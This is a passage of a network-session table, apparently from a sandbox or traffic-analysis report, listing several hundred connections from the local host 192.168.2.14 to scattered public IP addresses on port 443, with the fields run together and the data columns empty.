                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12537192.168.2.145031246.234.249.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12538192.168.2.1444940124.172.250.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12539192.168.2.145396651.115.111.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12540192.168.2.145689479.41.229.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12541192.168.2.1438840181.173.205.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12542192.168.2.1436124123.58.45.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12543192.168.2.143482052.23.206.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12544192.168.2.1459770194.24.172.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12545192.168.2.1450814169.78.246.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12546192.168.2.1450314135.255.172.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12547192.168.2.14363969.28.121.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12548192.168.2.145088476.99.107.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12549192.168.2.1453394218.173.148.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12550192.168.2.145667024.222.179.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12551192.168.2.143814677.185.59.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12552192.168.2.1451196155.240.211.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12553192.168.2.1440136116.51.66.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12554192.168.2.1434328179.85.192.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12555192.168.2.1433392167.136.110.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12556192.168.2.1442500116.165.106.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12557192.168.2.1449536152.198.228.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12558192.168.2.145808849.210.138.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12559192.168.2.1452796125.186.50.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12560192.168.2.1458064157.58.32.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12561192.168.2.1458102118.167.101.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12562192.168.2.1438674212.144.96.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12563192.168.2.145864642.248.43.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12564192.168.2.1447688223.232.81.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12565192.168.2.1443494108.188.160.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12566192.168.2.1442302120.24.242.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12567192.168.2.1437058177.172.152.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12568192.168.2.1434652213.115.176.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12569192.168.2.144834478.68.197.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12570192.168.2.145845076.13.138.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12571192.168.2.1444098107.150.49.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12572192.168.2.1448886128.28.243.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12573192.168.2.1458018190.126.74.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12574192.168.2.1459274170.134.104.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12575192.168.2.144039631.121.98.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12576192.168.2.1444280158.63.152.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12577192.168.2.144179863.214.1.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12578192.168.2.1436672145.215.2.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12579192.168.2.144356836.85.213.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12580192.168.2.1439836173.130.213.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12581192.168.2.14345348.175.157.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12582192.168.2.1444738182.110.116.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12583192.168.2.1459962116.41.18.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12584192.168.2.144395493.79.74.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12585192.168.2.1446012185.7.122.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12586192.168.2.1460362141.192.250.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12587192.168.2.146041272.15.178.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12588192.168.2.1457770165.71.71.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12589192.168.2.143849470.133.33.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12590192.168.2.1457654103.111.86.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12591192.168.2.1452326184.36.244.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12592192.168.2.1450198130.159.58.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12593192.168.2.1451712196.40.12.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12594192.168.2.1435296187.14.37.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12595192.168.2.1457952104.58.149.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12596192.168.2.145535617.3.127.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12597192.168.2.1460450205.33.55.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12598192.168.2.1458804183.78.237.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12599192.168.2.143561843.140.41.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12600192.168.2.145870043.156.254.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12601192.168.2.1454494178.168.143.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12602192.168.2.1453476156.90.149.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12603192.168.2.145753657.208.79.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12604192.168.2.145021262.102.198.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12605192.168.2.1457220158.5.220.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12606192.168.2.145707048.150.7.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12607192.168.2.1437756168.97.205.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12608192.168.2.1454006216.201.237.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12609192.168.2.1456302180.137.7.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12610192.168.2.1439212171.232.239.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12611192.168.2.143358494.27.227.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12612192.168.2.145587678.190.152.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12613192.168.2.1444104115.213.113.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12614192.168.2.1433174198.239.111.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12615192.168.2.145013214.160.54.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12616192.168.2.144766240.31.124.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12617192.168.2.145261653.248.148.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12618192.168.2.144130696.231.76.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12619192.168.2.1443612111.226.73.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12620192.168.2.1460022131.70.30.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12621192.168.2.1440678121.185.172.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12622192.168.2.145232890.175.216.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12623192.168.2.1441758112.182.13.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12624192.168.2.143670284.13.27.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12625192.168.2.1446462187.215.154.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12626192.168.2.144915283.31.44.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12627192.168.2.144387460.197.156.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12628192.168.2.1433538141.15.88.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12629192.168.2.146019837.32.104.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12630192.168.2.1446570172.37.91.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12631192.168.2.1451824139.234.31.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12632192.168.2.145858250.86.130.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12633192.168.2.143384420.123.139.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12634192.168.2.1459236143.33.75.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12635192.168.2.145839220.98.42.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12636192.168.2.143639499.167.36.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12637192.168.2.1449568129.210.197.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12638192.168.2.1452984189.215.149.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12639192.168.2.143861486.132.105.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12640192.168.2.145384036.217.119.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12641192.168.2.1443366208.154.223.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12642192.168.2.1441732210.134.54.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12643192.168.2.1460694195.38.222.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12644192.168.2.145364464.59.15.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12645192.168.2.1441910198.241.211.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12646192.168.2.1460652218.201.49.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12647192.168.2.143941852.1.153.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12648192.168.2.1442564198.71.125.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12649192.168.2.1446360103.49.136.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12650192.168.2.144026047.130.23.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12651192.168.2.145090674.29.200.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12652192.168.2.145905636.31.68.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12653192.168.2.145291241.120.206.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12654192.168.2.1435892140.6.15.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12655192.168.2.145255620.26.7.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12656192.168.2.143862250.163.208.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12657192.168.2.1433556183.47.102.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12658192.168.2.1440036170.187.155.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12659192.168.2.1447092200.32.180.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12660192.168.2.1432796147.12.237.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12661192.168.2.145498051.132.251.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12662192.168.2.144630253.127.63.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12663192.168.2.14333342.20.34.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12664192.168.2.145443095.60.13.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12665192.168.2.1439382183.107.158.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12666192.168.2.143546063.158.189.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12667192.168.2.1453694111.188.187.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12668192.168.2.1434896223.67.216.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12669192.168.2.1459052183.251.92.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12670192.168.2.1443646165.170.118.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12671192.168.2.1438326106.148.42.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12672192.168.2.1457456186.54.235.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12673192.168.2.144854432.194.213.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12674192.168.2.145342037.180.53.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12675192.168.2.1447982101.252.90.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12676192.168.2.1456620185.207.205.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12677192.168.2.1454076136.15.149.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12678192.168.2.1433326222.159.231.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12679192.168.2.1441314191.70.75.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12680192.168.2.145759469.36.81.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12681192.168.2.145357860.116.161.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12682192.168.2.1444006199.173.158.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12683192.168.2.146080654.220.190.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12684192.168.2.145799696.5.10.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12685192.168.2.144892458.142.80.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12686192.168.2.143596640.64.231.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12687192.168.2.145380014.179.173.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12688192.168.2.1456374170.39.80.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12689192.168.2.1438188211.10.172.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12690192.168.2.145552457.243.73.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12691192.168.2.1459578104.178.49.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12692192.168.2.145252813.134.180.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12693192.168.2.1457410144.82.108.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12694192.168.2.144325279.222.150.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12695192.168.2.145773088.178.51.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12696192.168.2.143977220.232.43.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12697192.168.2.1449886220.17.136.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12698192.168.2.1449722122.31.120.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12699192.168.2.145317699.99.50.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12700192.168.2.145503025.101.146.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12701192.168.2.144876877.114.201.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12702192.168.2.1443374167.167.221.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12703192.168.2.146026631.203.173.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12704192.168.2.1443986174.76.119.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12705192.168.2.144081452.38.143.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12706192.168.2.1455674172.157.69.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12707192.168.2.1437038114.152.38.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12708192.168.2.143924091.38.124.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12709192.168.2.1434986154.40.158.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12710192.168.2.145262698.64.237.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12711192.168.2.1460204179.210.53.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12712192.168.2.1437356134.147.126.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12713192.168.2.145907685.223.19.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12714192.168.2.144933053.146.23.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12715192.168.2.143955888.219.59.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12716192.168.2.1432782207.86.143.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12717192.168.2.1447818217.45.119.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12718192.168.2.1440056110.172.83.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12719192.168.2.144902666.145.199.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12720192.168.2.1439962131.71.234.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12721192.168.2.1450948186.112.131.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12722192.168.2.1451148148.42.10.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12723192.168.2.145738064.157.171.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12724192.168.2.1447980174.100.254.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12725192.168.2.1457410162.155.193.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12726192.168.2.1440612208.46.105.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12727192.168.2.144713843.191.99.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12728192.168.2.143778886.186.71.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12729192.168.2.1443972122.230.190.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12730192.168.2.145155874.131.191.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12731192.168.2.144826266.218.19.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12732192.168.2.144688238.168.182.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12733192.168.2.143435470.181.45.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12734192.168.2.1442192133.82.3.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12735192.168.2.144255286.234.187.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12736192.168.2.1441450175.49.181.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12737192.168.2.144411665.135.137.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12738192.168.2.1433426117.14.83.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12739192.168.2.1441350181.161.171.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12740192.168.2.1448458137.9.195.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12741192.168.2.1436984124.100.144.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12742192.168.2.1452578169.121.228.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12743192.168.2.1459328189.130.73.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12744192.168.2.1440468174.13.147.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12745192.168.2.1460910213.98.178.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12746192.168.2.145389219.17.173.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12747192.168.2.1441466136.85.17.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12748192.168.2.1455448113.172.140.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12749192.168.2.1439250172.174.48.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12750192.168.2.144729865.166.76.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12751192.168.2.1454334212.146.57.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12752192.168.2.1437270199.162.47.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12753192.168.2.1438304200.181.108.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12754192.168.2.1447814115.211.29.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12755192.168.2.14373841.181.231.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12756192.168.2.1438232157.78.135.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12757192.168.2.1439226114.252.71.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
